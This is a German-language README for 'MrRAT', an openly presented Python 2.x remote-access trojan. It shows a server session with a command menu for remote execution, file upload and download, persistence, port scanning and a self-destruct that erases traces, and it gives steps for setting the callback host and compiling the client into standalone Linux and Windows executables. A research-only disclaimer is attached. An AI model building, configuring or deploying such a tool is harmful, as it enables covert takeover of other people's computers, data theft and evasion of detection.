
🐭 Dies ist ein plattformübergreifender Remote-Access-Trojaner (RAT) für Python 2.x.
Dies ist ein plattformübergreifender Remote-Access-Trojaner (RAT) für Python 2.x. MrRAT wurde entwickelt, um einen aufgeräumten, voll ausgestatteten Python-RAT mit klarem Design zu bieten. Derzeit befindet sich das Projekt in Arbeit und wird noch aktiv weiterentwickelt.
Haftungsausschluss: Dieser RAT dient ausschließlich Forschungszwecken und sollte nur auf autorisierten Systemen eingesetzt werden. Der Zugriff auf ein Computersystem oder Netzwerk ohne Genehmigung oder ausdrückliche Erlaubnis ist illegal.
$ python MrRAT_server.py --port 1337
/$$ /$$ /$$$$$$$ /$$$$$$ /$$$$$$$$
| $$$ /$$$ | $$__ $$ /$$__ $$|__ $$__/
| $$$$ /$$$$ /$$$$$$ | $$ \ $$| $$ \ $$ | $$
| $$ $$/$$ $$ /$$__ $$| $$$$$$$/| $$$$$$$$ | $$
| $$ $$$| $$| $$ \__/| $$__ $$| $$__ $$ | $$
| $$\ $ | $$| $$ | $$ \ $$| $$ | $$ | $$
| $$ \/ | $$| $$ | $$ | $$| $$ | $$ | $$
|__/ |__/|__/ |__/ |__/|__/ |__/ |__/
, .
(\,;,/)
(o o)\//,
\ / \,
`+'( ( \ )
// \ |_./
'~' '~----'
https://github.com/user696/MrRAT
MrRAT server listening for connections on port 1337.
[?] MrRAT> help
client <id> - Connect to a client.
clients - List connected clients.
download <files> - Download file(s).
execute <command> - Execute a command on the target.
help - Show this help menu.
kill - Kill the client connection.
persistence - Apply persistence mechanism.
quit - Exit the server and end all client connections.
scan <ip> - Scan top 25 ports on a single host.
selfdestruct - Remove all traces of the RAT from the target system.
survey - Run a system survey.
unzip <file> - Unzip a file.
upload <files> - Upload files(s).
wget <url> - Download a file from the web.
[?] MrRAT> clients
ID - Client Address
1 - 127.0.0.1
[?] MrRAT> client 1
[1] MrRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux
Beachten Sie, dass Sie vor dem Erstellen wahrscheinlich sowohl die Variablen HOST als auch PORT am Anfang von MrRAT_client.py an Ihre Bedürfnisse anpassen möchten.
Unter Linux benötigen Sie Python 2.x, PyInstaller und pycrypto. Führen Sie dann etwa pyinstaller2 --onefile MrRAT_client.py aus; es sollte ein dist/-Ordner erzeugt werden, der eine eigenständige ELF-Datei enthält.
Unter Windows benötigen Sie Python 2.x, PyInstaller, pycrypto, pywin32 und pefile. Führen Sie dann etwa C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile MrRAT_client.py aus; es sollte ein dist/-Ordner erzeugt werden, der eine eigenständige PE-Datei (portable executable) enthält.